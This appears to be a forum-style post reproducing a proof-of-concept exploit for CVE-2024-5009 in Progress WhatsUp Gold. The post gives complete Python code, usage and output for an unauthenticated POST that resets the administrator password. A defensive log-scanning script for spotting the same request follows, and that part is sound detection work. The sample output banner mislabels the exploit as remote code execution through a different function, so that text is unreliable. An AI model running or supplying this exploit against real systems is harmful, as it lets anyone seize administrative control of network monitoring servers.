
Local Privilege Escalation, WhatsUp Gold, CVE-2024-5009

blackhunt


CVE-2024-5009 PoC for Progress WhatsUp Gold SetAdminPassword Privilege Escalation (CVE-2024-5009)


Vulnerability analysis: https://summoning.team/blog/progress-whatsup-gold-privesc-setadminpassword-cve-2024-5009/

Usage:
Python:
python3 CVE-2024-5009.py --target https://192.168.0.231/

 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |

        (*) Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-5009)

        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)

        (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-privesc-setadminpassword-cve-2024-5009/



(^_^) Prepare for the Pwnage (^_^)

(*) Generated random password is: e9513bc41e2a9acf
(*) Escalating...
(+) Escalation done, new admin password is: e9513bc41e2a9acf

Exploit code:

Python:
"""
Progress WhatsUp Gold SetAdminPassword Privilege Escalation (CVE-2024-5009)
Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
Technical details: https://summoning.team/blog/progress-whatsup-gold-privesc-setadminpassword-cve-2024-5009/
"""
banner = r"""
 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |
                                                                                   
        (*) Progress WhatsUp Gold SetAdminPassword Privilege Escalation (CVE-2024-5009)
       
        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
       
        (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-privesc-setadminpassword-cve-2024-5009/
       
        """

""""""

import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse
import os


print(banner)
parser = argparse.ArgumentParser(usage="python CVE-2024-5009.py --target https://192.168.0.231")
parser.add_argument('--target', '-t', dest='target_url', help='Target URL (e.g: http://192.168.0.231:9642)', required=True)
parser.add_argument('--new-password', '-p', dest='new_password', help='new password for the administrator user', required=False)
args = parser.parse_args()
if(args.new_password):
    new_password = args.new_password
else:
    new_password = os.urandom(8).hex()

print("\n(^_^) Prepare for the Pwnage (^_^)\n")
print("(*) Generated random password is: " + new_password)

args.target_url = args.target_url.rstrip("/")

def exploit():
    print("(*) Escalating...")
    r = requests.post(args.target_url + "/NmConsole/Wug/Install/SetAdminPassword", data={"Password": new_password, "ConfirmPassword":new_password}, verify=False, allow_redirects=False)

    if(r.status_code == 302):
        print("(+) Escalation done, new admin password is: " + new_password)
    else:
        print("(-) Failed to change the password")
        print("(-) Response: " + r.text)

try:
    exploit()
except Exception as e:
    print("(-) An error occurred: " + str(e))
    exit(1)



Source (GitHub): https://github.com/sinsinology/CVE-2024-5009
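
A defensive check for the request this PoC sends, as an added example that is not part of the original post or the exploit author's code: it scans W3C extended web-server logs (assumed here to be the IIS log format on the WhatsUp Gold console host) for requests to /NmConsole/Wug/Install/SetAdminPassword and rates a POST answered with 302, the response the PoC treats as success, as high severity. The function name, severity labels and sample log lines are constructed for illustration.

```python
"""Flag requests to the WhatsUp Gold SetAdminPassword endpoint in W3C-format web logs."""

ENDPOINT = "/nmconsole/wug/install/setadminpassword"

# Constructed sample log (not from a real host); client IPs are documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-07-01 10:00:01 GET /NmConsole/ - 198.51.100.7 200
2024-07-01 10:00:05 POST /NmConsole/Wug/Install/SetAdminPassword - 203.0.113.9 302
2024-07-01 10:00:09 POST /nmconsole/wug/install/setadminpassword/ - 203.0.113.9 401
2024-07-01 10:01:00 POST /NmConsole/api/core/login - 198.51.100.7 200
"""


def find_set_admin_password_hits(lines):
    """Return one dict per request to ENDPOINT, using the log's own #Fields header."""
    fields, hits = [], []
    for raw in lines:
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # the header can change mid-file after a restart
            continue
        if not line or line.startswith("#") or not fields:
            continue  # comments, blanks, or data seen before any field header
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed record
        rec = dict(zip(fields, values))
        stem = rec.get("cs-uri-stem", "").lower().rstrip("/")
        if stem != ENDPOINT:
            continue
        method, status = rec.get("cs-method", ""), rec.get("sc-status", "")
        hits.append({
            "when": f"{rec.get('date', '')} {rec.get('time', '')}".strip(),
            "client": rec.get("c-ip", "?"),
            "method": method,
            "status": status,
            # A POST answered with 302 is what the PoC reports as a completed reset.
            "severity": "high" if method == "POST" and status == "302" else "review",
        })
    return hits


if __name__ == "__main__":
    for hit in find_set_admin_password_hits(SAMPLE_LOG.splitlines()):
        print(hit)
```

Any hit on an installation that has already completed setup deserves a look, since the request in the PoC carries no credentials; a "high" hit means the administrator password should be treated as changed by whoever sent it.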
 

